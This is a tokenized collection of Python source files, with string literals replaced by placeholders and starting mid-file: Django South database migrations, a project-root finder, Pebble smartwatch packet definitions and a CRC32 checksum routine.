'<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : u"<STR_LIT>" } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ u'<STR_LIT>' ] } , <EOL> u'<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT:username>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:1>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) <EOL> } <EOL> } <EOL> complete_apps = [ '<STR_LIT>' ] </s>
<s> from south . utils import datetime_utils as datetime <EOL> from south . db import db <EOL> from south . v2 import SchemaMigration <EOL> from django . db import models <EOL> class Migration ( SchemaMigration ) : <EOL> def forwards ( self , orm ) : <EOL> db . delete_unique ( u'<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> db . add_column ( u'<STR_LIT>' , '<STR_LIT>' , <EOL> self . gf ( '<STR_LIT>' ) ( max_length = <NUM_LIT:50> , null = True ) , <EOL> keep_default = False ) <EOL> db . alter_column ( u'<STR_LIT>' , '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( null = True ) ) <EOL> def backwards ( self , orm ) : <EOL> db . delete_column ( u'<STR_LIT>' , '<STR_LIT>' ) <EOL> db . alter_column ( u'<STR_LIT>' , '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( default = <NUM_LIT:0> ) ) <EOL> db . create_unique ( u'<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> models = { <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:password>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT:username>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:state>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:1>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT:1>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:None>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:target>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> u'<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT:username>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:1>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:2>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) <EOL> } <EOL> } <EOL> complete_apps = [ '<STR_LIT>' ] </s>
<s> __author__ = '<STR_LIT>' <EOL> from django . utils . translation import ugettext as _ <EOL> def find_project_root ( contents ) : <EOL> MANIFEST = '<STR_LIT>' <EOL> SRC_DIR = '<STR_LIT>' <EOL> for base_dir in contents : <EOL> print base_dir <EOL> try : <EOL> dir_end = base_dir . index ( MANIFEST ) <EOL> print dir_end <EOL> except ValueError : <EOL> continue <EOL> else : <EOL> if dir_end + len ( MANIFEST ) != len ( base_dir ) : <EOL> print '<STR_LIT>' <EOL> continue <EOL> base_dir = base_dir [ : dir_end ] <EOL> print base_dir <EOL> for source_dir in contents : <EOL> if source_dir [ : dir_end ] != base_dir : <EOL> continue <EOL> if not source_dir . endswith ( '<STR_LIT>' ) and not source_dir . endswith ( '<STR_LIT>' ) : <EOL> continue <EOL> if source_dir [ dir_end : dir_end + len ( SRC_DIR ) ] != SRC_DIR : <EOL> continue <EOL> break <EOL> else : <EOL> continue <EOL> break <EOL> else : <EOL> raise Exception ( _ ( "<STR_LIT>" ) ) <EOL> return base_dir </s>
<s> from __future__ import absolute_import <EOL> __author__ = '<STR_LIT>' <EOL> from enum import IntEnum <EOL> from . base import PebblePacket <EOL> from . base . types import * <EOL> __all__ = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" ] <EOL> class AppMessageTuple ( PebblePacket ) : <EOL> """<STR_LIT>""" <EOL> class Type ( IntEnum ) : <EOL> ByteArray = <NUM_LIT:0> <EOL> CString = <NUM_LIT:1> <EOL> Uint = <NUM_LIT:2> <EOL> Int = <NUM_LIT:3> <EOL> key = Uint32 ( ) <EOL> type = Uint8 ( ) <EOL> length = Uint16 ( ) <EOL> data = BinaryArray ( length = length ) <EOL> class AppMessagePush ( PebblePacket ) : <EOL> uuid = UUID ( ) <EOL> count = Uint8 ( ) <EOL> dictionary = FixedList ( AppMessageTuple , count = count ) <EOL> class AppMessageACK ( PebblePacket ) : <EOL> pass <EOL> class AppMessageNACK ( PebblePacket ) : <EOL> pass <EOL> class AppMessage ( PebblePacket ) : <EOL> class Meta : <EOL> endpoint = <NUM_LIT> <EOL> endianness = '<STR_LIT:<>' <EOL> command = Uint8 ( ) <EOL> transaction_id = Uint8 ( ) <EOL> data = Union ( command , { <EOL> <NUM_LIT> : AppMessagePush , <EOL> <NUM_LIT> : AppMessageACK , <EOL> <NUM_LIT> : AppMessageNACK , <EOL> } ) <EOL> class StockAppSetTitle ( PebblePacket ) : <EOL> class Meta : <EOL> endpoint = <NUM_LIT> <EOL> endianness = '<STR_LIT:<>' <EOL> register = False <EOL> class App ( IntEnum ) : <EOL> Sports = <NUM_LIT> <EOL> Golf = <NUM_LIT> <EOL> app = Uint8 ( enum = App ) <EOL> title = FixedString ( None ) <EOL> class StockAppSetIcon ( PebblePacket ) : <EOL> class Meta : <EOL> endpoint = <NUM_LIT> <EOL> endianness = '<STR_LIT:<>' <EOL> register = False <EOL> class App ( IntEnum ) : <EOL> Sports = <NUM_LIT> <EOL> Golf = <NUM_LIT> <EOL> app = Uint8 ( enum = App ) <EOL> row_size = Uint16 ( ) <EOL> info_flags = Uint16 ( default = <NUM_LIT> ) <EOL> origin_x = Uint16 ( ) <EOL> origin_y = Uint16 ( ) <EOL> size_x = Uint16 ( ) <EOL> size_y = Uint16 ( ) <EOL> image_data = BinaryArray ( ) </s>
<s> from __future__ import division <EOL> from six . moves import range <EOL> import array <EOL> CRC_POLY = <NUM_LIT> <EOL> def process_word ( data , crc = <NUM_LIT> ) : <EOL> if len ( data ) < <NUM_LIT:4> : <EOL> d_array = array . array ( '<STR_LIT:B>' , data ) <EOL> for x in range ( <NUM_LIT:0> , <NUM_LIT:4> - len ( data ) ) : <EOL> d_array . insert ( <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> d_array . reverse ( ) <EOL> data = d_array . tostring ( ) <EOL> d = array . array ( '<STR_LIT:I>' , data ) [ <NUM_LIT:0> ] <EOL> crc = crc ^ d <EOL> for i in range ( <NUM_LIT:0> , <NUM_LIT:32> ) : <EOL> if ( crc & <NUM_LIT> ) != <NUM_LIT:0> : <EOL> crc = ( crc << <NUM_LIT:1> ) ^ CRC_POLY <EOL> else : <EOL> crc = ( crc << <NUM_LIT:1> ) <EOL> result = crc & <NUM_LIT> <EOL> return result <EOL> def process_buffer ( buf , c = <NUM_LIT> ) : <EOL> word_count = len ( buf ) // <NUM_LIT:4> <EOL> if len ( buf ) % <NUM_LIT:4> != <NUM_LIT:0> : <EOL> word_count += <NUM_LIT:1> <EOL> crc = c <EOL> for i in range ( <NUM_LIT:0> , word_count ) : <EOL> crc = process_word ( buf [ i * <NUM_LIT:4> : ( i + <NUM_LIT:1> ) * <NUM_LIT:4> ] , crc ) <EOL> return crc <EOL> def crc32 ( data ) : <EOL> return process_buffer ( data ) </s>
